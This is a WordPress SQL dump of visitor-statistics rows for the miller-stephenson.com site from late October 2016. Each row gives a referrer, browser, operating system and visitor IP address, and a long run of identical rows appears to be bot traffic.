INSERT INTO `wp_statistics_visitor` VALUES (13513, '2016-10-29', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '89.42.144.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13514, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.165.182.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13515, '2016-10-29', 'https://confib.ifmo.ru/', 'Opera', 'Windows', '7.60', '', '46.119.118.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13516, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '27.34.244.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13517, '2016-10-29', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13518, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '50.62.208.38', '000', 43, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13519, '2016-10-29', 'https://www.google.com.sa/', 'Chrome', 'Windows', '54.0.2840.71', '', '188.55.214.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13520, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '54.0.2840.68', '', '187.208.189.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13521, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.82.212.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13522, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6', '', '163.172.14.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13523, '2016-10-29', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '169.53.6.107', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13524, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '46.234.230.213', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13525, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '109.0.162.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13526, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13527, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.126', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13528, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '71.211.164.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13529, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13530, '2016-10-29', 'https://www.miller-stephenson.com/product/conformal-coating-stripper/', 'Firefox', 'Windows', '33.0', '', '98.109.101.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13531, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13532, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '37.57.33.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13533, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.46.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13534, '2016-10-29', 'https://www.google.com.tr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCQQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Fkrytox-lubricants%2F&ei=IQwVWLHaF43f6wLMGw&usg=AFQjCNFJMcZt6xCpXzcHAOYSpI7Q31y8hg', 'MSIE', 'Windows', '11.0', '', '66.249.88.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13535, '2016-10-29', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/', 'MSIE', 'Windows', '11.0', '', '66.249.88.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13536, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '212.227.109.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13537, '2016-10-29', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '172.56.13.161', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13538, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.18', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13539, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13540, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.192.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13541, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.196.6.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13542, '2016-10-29', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '192.168.5.40', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13543, '2016-10-29', 'https://duckduckgo.com/', 'Firefox', 'Macintosh', '48.0', '', '69.239.235.198', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13544, '2016-10-29', 'https://lnkd.in', 'AppleWebKit', 'iPhone', '602.1.50', '', '207.190.10.44', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13545, '2016-10-29', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '174.238.2.255', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13546, '2016-10-29', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '125.209.235.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13547, '2016-10-29', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'iPhone', '601.1.46', '', '125.209.235.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13548, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '125.209.235.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13549, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '23.0.1271.95', '', '54.91.16.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13550, '2016-10-29', 'https://www.miller-stephenson.com/product/ms-725727/', 'Safari', 'iPhone', '7.0', '', '199.30.24.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13551, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '65.94.41.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13552, '2016-10-29', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CEEQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fvazo_overview.html&ei=xyEVWKn2KJeFUKUo&usg=AFQjCNESI5yDu11sJVIRdHyRBsQiHWCyHw', 'MSIE', 'Windows', '11.0', '', '66.249.88.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13553, '2016-10-29', 'https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/', 'MSIE', 'Windows', '11.0', '', '66.249.88.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13554, '2016-10-29', 'https://www.miller-stephenson.com', 'YisouSpider', 'Unknown', 'Unknown', '', '42.156.137.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13555, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13556, '2016-10-29', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13557, '2016-10-29', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '12.246', '', '131.253.38.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13558, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13559, '2016-10-29', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '89.29.171.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13560, '2016-10-29', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '95.142.159.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13561, '2016-10-29', 'https://www.miller-stephenson.com/product/vazo-67-radical-initiator/', 'Firefox', 'Windows', '3.5.2', '', '195.9.239.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13562, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '54.0.2840.71', '', '96.245.135.254', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13563, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.245.84', '000', 49, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13564, '2016-10-30', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '71.145.210.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13565, '2016-10-30', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.183.80.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13566, '2016-10-30', 'https://www.e9coupe.com/forum/threads/wheel-bearings-or-something-else-help.16581/', 'Chrome', 'Android', '54.0.2840.68', '', '70.215.137.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13567, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13568, '2016-10-30', 'https://autolombard-krasnodar.ru/', 'MSIE', 'Unknown', '7.0b', '', '5.248.253.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13569, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '70.50.165.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13570, '2016-10-30', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1224.a3a-Ida1ko27rjE5t_XSrHAUTfnaNcNTwNt-VFV97Ru9L3MINn1-iyX7WzSFwGmG.52a21424d8a7d966a4a29054fa8a1b306a46fd79&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXh6MWltUlVTSUtvbmFJNXNyUGF0RXRuNVRwNHhxTThuRGE2d09xNnN0Mno3MUFvbmFkM3phYS1pX1NNM3FJd3ZJU0EtbnV6bXdXNFBGdGNWUEZDWmZB&b64e=2&sign=30282170b9ff47d51852745fca205723&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbaDKJKFVf3sljDYRVKBBOp4kEyH0a07nQLY3tMy567Sww4954UODVx_4AlUJ3Ua_mUHGXC0CRjwWz4jUOsjDp5WFvygQLqyoK3r2YDThOicYAje3M1c95i6w&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUZ--EnxDBlw4R78x87r1beBLrjNTc-z8d4z-ctJfcDRP3tmDlCB2fRDEBeHxLuPTwblP0TjzW6czGqpnG5zLZt&l10n=ru&cts=1477787340360&mc=2.60579884941', 'MSIE', 'Windows', '8.0', '', '46.73.173.104', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13571, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13572, '2016-10-30', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '46.166.141.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13573, '2016-10-30', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '46.166.141.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13574, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '109.232.216.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13575, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '107.161.24.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13576, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '45.55.133.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13577, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '176.119.79.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13578, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '50.62.133.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13579, '2016-10-30', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13580, '2016-10-30', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '75.44.102.213', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13581, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '202.181.99.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13582, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 118, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13583, '2016-10-30', 'https://www.google.com/search?q=krytox+lvp+as+dielectric&biw=360&bih=615&noj=1&source=lnms&sa=X&ved=0ahUKEwj725S3vYHQAhWLjlQKHXghC5EQ_AUISSgA', 'Chrome', 'Android', '34.0.1847.76', '', '97.124.127.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13584, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '26.0.1410.65', '', '52.70.48.63', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13585, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13586, '2016-10-30', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.95', '', '68.180.57.69', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13587, '2016-10-30', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '24.106.220.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13588, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '1.171.59.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13589, '2016-10-30', 'https://crazyboost.pro/', 'MSIE', 'Windows', '6.0', '', '178.137.95.202', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13590, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.200.228', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13591, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '83.143.81.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13592, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '210.134.165.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13593, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '103.206.22.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13594, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.71.231.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13595, '2016-10-30', 'https://www.bing.com/search?q=Vertrel+SDG+Vapor+Degreasing&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.129', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13596, '2016-10-30', 'https://www.miller-stephenson.com/chemicals/solvents/vertrel/', 'MSIE', 'Windows', '9.0', '', '204.79.180.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13597, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.149.70.74', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13598, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '91.208.99.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13599, '2016-10-30', 'https://kharkov.mistr-x.org/', 'MSIE', 'Windows', '6.0', '', '46.119.119.89', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13600, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.58.84.58', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13601, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '213.133.121.63', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13602, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '37.9.169.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13603, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '111.67.23.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13604, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '198.49.74.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13605, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '216.172.189.107', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13606, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '37.58.75.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13607, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '166.62.34.128', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13608, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '65.99.237.196', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13609, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '188.40.0.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13610, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '166.62.93.243', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13611, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '212.227.137.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13612, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '69.163.195.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13613, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '50.87.164.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13614, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '185.34.192.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13615, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '74.217.90.250', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13616, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '103.42.56.24', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13617, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '74.217.90.250', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13618, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '69.64.82.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13619, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '74.217.90.250', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13620, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '45.40.142.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13621, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '195.74.38.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13622, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '174.136.13.166', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13623, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '125.24.53.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13624, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '83.137.145.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13625, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '52.4.38.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13626, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '31.31.79.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13627, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '212.113.135.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13628, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '89.221.250.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13629, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '216.131.94.96', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13630, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '66.33.194.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13631, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '195.74.38.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13632, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '67.23.244.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13633, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '81.21.192.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13634, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '70.32.72.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13635, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '85.220.155.140', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13636, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '83.236.228.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13637, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '196.11.102.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13638, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '54.77.133.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13639, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '174.136.12.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13640, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '173.254.103.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13641, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '185.22.92.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13642, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '164.132.97.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13643, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '176.98.75.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13644, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '77.81.165.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13645, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '205.196.208.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13646, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '195.128.174.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13647, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '50.62.208.60', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13648, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '195.159.29.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13649, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '95.143.206.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13650, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '92.53.114.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13651, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '104.131.223.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13652, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '188.165.229.148', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13653, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '195.250.189.237', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13654, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '94.138.209.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13655, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '23.91.70.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13656, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '37.58.75.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13657, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '43.0.2357.130', '', '186.202.161.161', '000', 1, 0); 
